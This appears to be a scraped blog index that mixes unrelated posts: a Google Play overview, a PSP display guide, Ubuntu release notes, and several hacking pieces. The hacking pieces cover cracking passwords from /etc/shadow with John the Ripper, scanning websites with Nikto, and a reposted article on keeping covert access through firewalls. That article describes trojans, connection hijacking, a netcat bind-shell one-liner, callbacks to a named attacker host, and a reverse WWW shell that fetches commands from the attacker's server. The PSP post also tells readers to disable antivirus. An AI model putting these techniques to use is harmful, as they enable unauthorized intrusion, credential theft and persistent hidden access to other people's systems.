Google Play Introduced

If you go in to the address market.google.com it will redirect itself to a new address that is play.google.com.
I am a bit late in writing this but i think many dont even care to go in to market and find the apps they need.
Google Play is going to be your one stop shop for all your favourite entertainment.With over 450,000 apps, millions of songs and books and thousands of movies,Google play has something for you.
Actually Google Play is divided in to 4 main parts

1. Google Play for Movies
2. Google Play for Music
3. Google Play for Apps and Games
4. Google Play for Books

Google Play Cloud

Google play offers more facilities for its users.It combines the power of cloud and user experience together. You can possibly buy a book on your android device and just read and enjoy the book in web.Google Play makes it possible to their customers.You can read ,watch,listen your content any time and anywhere you wish.No software required and no wires or syncing needed and the best part-Google Play cloud is free to use.

Share what you love

Google Play offers another option to Discover,shop,enjoy and share music,movies,books and apps anytime anywhere.When you discover an amazing song,a nail-biting horror or a memorable movie,the first thing you want to do is to share with your best friends.Seeing that in mind integrating Google + in to Google Play they provide you an option to share it directly to Google +.You can easily share it on your wall or send an email in just one click.

• Google Play for Movies

With Google Play you can watch HD movies including new releases,award-winning films and your favourite classics on any Android device or on the Web.Stream Movies and watch them online or you can download the movie which makes offline viewing possible.
Rent Movies and watch them instantly.Alternatively download your movie for offline viewing and view it later using Google Play Movies app or watch it directly on the Web.

• Google Play for Music

With Google Play you can find new artists and browse through millions of tracks just for you.You can also store up to 20,000 songs from your own library for free and instantly access your music on any Android devices or the web and the good news is there is no  more syncing or wires.
Sharing is caring isn't it? Google really pays respect to those words.Google Play allows you to give your friends a free listen to all those who are on Google +. And you get a free listen when they share what they have bought with you.It's sharing, discovering and buying music that Google had made just in to a Play.
Keep all your music in one place.All the music you get is stored in your music library automatically where as i said you can store up to 20,000 of your own songs for free.This helps you to save your space and also enjoy your collection anywhere.

• Google Play for Books

Are you searching over old books in the library for a new interesting book? Well you needn't to do that again because Google Play brings you an easy way to search for your favourite authors and new books in their collection.With Google Play,your next great read is always at fingertips.

You can shop the books at any time from anywhere in your Android Device or Web.Choose from millions of titels,browse new releases,sample books for free,and find the latest up-coming authors.

You can also share what you love with your family and friends via Bluetooth,Gmail or Google +.

All your books will be stored in cloud so that you can access it from anywhere.

• Google Play For Apps and Games

Looking for an app for your Android Device.Then you must have heard why android market has the biggest app collection ever.Yes Android Market goes into new meaning with Google Play while it continues to accept apps from all developers around.With over 450,000 Android Apps and games your phonetruly is your mobile entertaining system,organizer and portable computer all wrapped in one.

Finding new apps has always been easy on Android Market.It gets more  easier with the new Google Play.

If you are ready with the app you need dont even bother to touch your system to install your new app.Just select your device from web and find the app in your device. Isn't it easy?

Read More

Play Your PC Games on PSP

I have earlier posted on how we can play PSP games on PC. Now let us think of playing the opposite.
We will do this step by step.

1. Download PSPdisp Click here to download.
2. Disable your antivirus before you start the installation because those may interrupt  
3. The Complete process of copying your data is completed while you install the software

• Let me help you with that too
• While Installing the software on your PC the OS will come up with the statement that the drivers are not proper.Just ignore the warning and continue with the installation. 
• After the drivers are installed a window will open up like this.This will be happening during the installation of software.

• In this window You should see a set of instructions on how to connect and get your PSP ready.Follow all the steps and i dont feel it necessary to explain all steps coz all these are easy and you can do it with ease.
• After completing the five steps in the window just click Copy Files Button
• Your PSP will start working from this moment and if the copying is completed successfully it should report you that in a new window.
• Now the setup will resume from the point where it stopped and asked you to copy the files.
• After completing the setup you should see another window.Just untick the view help file and click Finish

• In your tray bar you will see a popup message showing your IP address.You will have to note this down.It should be something like 192.168.X.X
• You have two options to make your PSP work on your PC.You can connect the PSP in two ways using you LAN address and USB.
• In the tray right click the icon of PSPdisp and then go to connection  and select the option you need.If you are selecting the LAN enter your IP address you noted down earlier in your PSP.Connect it to your PC and actually you can play anything in your PSP,Browse the internet and much more
• If you are selecting the USB connection option then you have to just connect it with your USB cable and you can use all functions as in LAN.

Any problems on this article can be mentioned as comments in this site.All your comments are welcome.

I will try to get a much better way (if exists)  to play the games on PSP.If you know please leave it in the comments

Enjoy :)

Read More

Linux Password Cracking: Explain unshadow and john commands ( john the ripper tool )

John cracking modes

John can work in the following modes:
[a] Wordlist : John will simply use a file with a list of words that will be checked against the passwords. See RULES for the format of wordlist files.

[b] Single crack : In this mode, john will try to crack the password using the login/GECOS information as passwords.

[c] Incremental : This is the most powerful mode. John will try any character combination to resolve the password. Details about these modes can be found in the MODES file in john’s documentation, including how to define your own cracking methods.

Install John the Ripper Password Cracking Tool

John the ripper is not installed by default. If you are using Debian / Ubuntu Linux, enter:
$ sudo apt-get install john

Note: RHEL, CentOS, Fedora, Redhat Linux user can grab john the ripper here. Once downloaded use rpm command:
# rpm -ivh john*

How do I use John the ripper to check weak passwords / crack passwords?

First use the unshadow command to combines the /etc/passwd and /etc/shadow files so John can use them. You might need this since if you only used your shadow file, the GECOS information wouldn’t be used by the "single crack" mode, and also you wouldn’t be able to use the -shells option. On a normal system you’ll need to run unshadow as root to be able to read the shadow file. So login as root or use old good sudo / su command under Debian / Ubuntu Linux:
$ sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

RHEL / CentOS / Fedora Linux user type the following command:
# /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

To check weak password (crack password), enter the following command:

WARNING! These examples uses brute-force ~ CPU-time consuming password cracking techniques.
To use John, you just need to supply it a password file created using unshadow command along with desired options. If no mode is specified, john will try "single" first, then "wordlist" and finally "incremental" password cracking methods.
$ john /tmp/crack.password.db

Output:

john /tmp/crack.password.db
Loaded 1 password (FreeBSD MD5 [32/32])
This procedure will take its own time. To see the cracked passwords, enter:
$ john -show /tmp/crack.password.db

test:123456:1002:1002:test,,,:/home/test:/bin/bash
didi:abc123:1003:1003::/home/didi:/usr/bin/rssh
2 passwords cracked, 1 left
Above output clearly indicates - user test has 123456 and didi has abc123 password.

Read More

Website Hacking With Ubuntu

Nikto : Command line tool for scanning web servers
Nikto is a website vulnerability scanning tool(Free and Open Source) made fr0m Perl(A script programming language like php or python).Hence you can use Nikto as a web server assessment tool for finding insecure files and programs on web server(Specialy against XSS vulnerabilities;Cross Site Scripting is one of the important hacking techniques used thesedays by the most of the attackers).

Scanning Websites Using Nikto will give following information :

• misconfigured server and software
• default programs and files
• insecure programs and files
• outdated programs and servers or plugins

Nikto is available for all the major Operating systems i.e for Linux,MacOSX and windows(By using ActiveState perl).

How to install Nikto in Ubuntu 10.04 :
In Ubuntu 10.04 you can easily install the Nikto by using Synaptic Package Manager.
1.Open the Synaptic Package Manager and search for “nikto”.
2.Check the box for install.
3.Click on Apply changes to install the checked packages.
4.It may ask for installing other dependencies if so then click ok.
5.Installation will begin and wait for its completion.
6.After completion of the installation you can invoke Nikto fr0m the terminal.

Invoking Nikto fr0m Ubuntu 10.04 shell :
Hit CTRL+ALT+T (Default shortcut for starting terminal) or start it fr0m Applications->Accessories->terminal.

Some Commonly used commands for hacking :
nikto -host : to specify the host to scan

(after host you can put host name or IP address of the target web server)

-port : TCP port(s) to scan.You can put by using comma e.g (80,443) or by giving the range of port such as (80-100)

-cgidirs : For scanning specified cgi directories.

-dbcheck : Check the scan databases for syntax errors.

-update : Updates the plugins and databases fr0m cirt.net.

-tunning : this option is used to tune the scan test against the target.

-format : It is used to specify the file format of the output.

For more information about the commands used in Nikto you can go to usr->share->doc->nikto->nikto_mannual.html or go to its official website. http://cirt.net/nikto2
Examples of website hacks :
nikto -host targethostname.com

- Nikto v2.03/2.04
—————————————————————————
+ Target IP: xxx.xxx.xxx.xxx
+ Target Hostname: targethostname.com
+ Target Port: 80
+ Start Time: 2010-05-24 16:43:05
—————————————————————————
+ Server: Apache
- /robots.txt – retrieved but it does not contain any ‘disallow’ entries (which is odd). (GET)
+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.2.12
+ OSVDB-5433: WebLogic may reveal its internal IP or hostname in the Location header. The value is “http://targethostname.com./”.
+ OSVDB-0: Non-standard header -cookie returned by server, with contents: wordpress_test_cookie=WP+Cookie+check; path=/
+ OSVDB-0: Non-standard header x-pingback returned by server, with contents: http://targethostname.com/xmlycp.php
+ OSVDB-0: Non-standard header x-powered-by returned by server, with contents: PHP/5.2.12

Read More

Convert Your .apk files to .jar files

*Links Updated.Sorry for the technical problems.Keep visiting our sites. CHEERS
I have searched a lot for a bit of information on converting .apk files to .jar files. I will share it with you.Let's get sarted.

Download .apk file from market

• Download any app from the Android Market [Go]
• Install Astro File Manager from Android Market [Go]  
• Open Astro > Tools > Application Manager/Backup and select the application to backup on SD card.
• Mount the phone as USB and access 'BACKUPAPPS' folder to find the apk of targetapp.(lets call this targetapp.apk).
• Copy it to your hard disk.

Decomiling apk to Dex format

• Download Dex2Jar [GO] 
• Android runs applications which are in Dalvik Executable (.dex) format.
• Run the following command to convert apk to jar.

dex2jar targetapp.apk file(./dex2jar targetapp.apk on terminal)

                                                 File 'targetapp.apk.dex2jar.jar' is created

[Click to Enlarge]

Viewing/Decompiling the Jar files to Java

Method 1 : Use JavaDecomiler (JD)

• Open 'targetapp.apk.dex2jar.jar' with jd-gui [Click to Download]  
• File > Save All Sources to save the class files in jar to java files.

Method 2 : JAD

• Extract contents of jar file on to a folder named src.  Use and unarchival utility like 7zip.
• Keep 'src' folder in the same directory where JAD and targetapp jar is present.
• Open JAD in cmd and execute the following command

jad -o -r -sjava -dsrc src/**/*.class (./jad on terminal)

Now src will contain decompiled Java files ready for manual code review.

Enjoy :)

Read More

Placing Backdoors through Firewalls

----[ Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.




----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:

This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:

This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interiour network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (Thats because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.
Proxies / Circuit Level Gateways:

A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installe.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:

This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and let you filter stuff but it was not programmed for the installation in a secure environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firwalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-by-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.


----[ Getting in

Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done.

The four main possibilities:

Insider:

There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:

Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:

People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashs netscape and executes a command (I never checked if this actually works, it crashs, yeah, but I didn't look through this if this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particulary true for the US, where academic environments and industry/military work close together.

Hijacking Connections:

Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

Trojans:

Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regulary (ftp xfer files and www logs can be checked to get to know which files these are).



----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regulary. It's the internal machines which are usually unprotected and without much administration and security checks.

I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on an stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.

Packet Filters:

It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which comes into my mind
is a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would be needed to to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://www.thc.org look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:

Here a hacker must use programs which initiates the connection from the secure network to his external 0wned server. There are many out there which could be used:

active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and it encrypts the datastream).

passive:
netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.

Proxies / Circuit Level Gateways:

If socks is used on the firewall, someone can use all those stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the application gateway section.

Application Gateways:

Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.
active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/ checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-)
(re-placing) a service/binary on the firewall. This is dangerous because those are audited regulary and sometimes even sniffed on permanent ...
Loading a loadable module into the firewall kernel wich hides itself and gives access to it's master. The best solution for an active backdoor but still dangerous.
passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in real the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example needs still much coding to be any effective)



----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:

+--------+                             +------------+                     +-------------+
 |internal|--------------------|   FIREWALL  |--------------|server owned |
 |  host   |  internal network     +------------+        internet    |by the hacker|
+--------+                                                                        +-------------+
   SLAVE                                                        MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching.
Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0

Master replies with
g5mAlfbknz
The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks:

The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's name in the process listing ...

Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect.

Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.



----[ The Source

Grab it here ...

rwwwshell v2.0



----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication. However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external servers every 3-20 calls or use aliases.

A secure solution would be to set up a second network which is connected to the internet, and the real one kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion Detection Systems can help. But nothing can stop a dedicated attacker.

Read More

Ubuntu 12.04 Alpha 2 Released

Features

• Focused on a more stable user experience with small tweaks
• New Unity Configuration Options have been added up with User Interface (earlier called 'Appearence') in the System Settings
•  The leaner fater UNITY 5.0 is included which brings minor new features to desktop including Lens Quicklists

HOME FOLDER QUICKLIST

Additonal options in CCSM for adding a 'Show Desktop' item, Changing Dash colour, etc.

                                   

Unity’s Overlay Scrollbars sport a slightly chunkier look: -

General Stuff:-

Alpha 2 specifics aside there are a number of other general changes testers should be aware of:

• Rhythmbox is the default music player
• There is no Ubuntu One Music Store plugin at present
• Tomboy and gBrainy are no longer installed by default
• LibreOffice 3.5 beta 2 is installed
• ‘Apport’ Crash reporting is enabled by default.

                            http://cdimage.ubuntu.com/releases/precise/alpha-2/ "copy link to download

Read More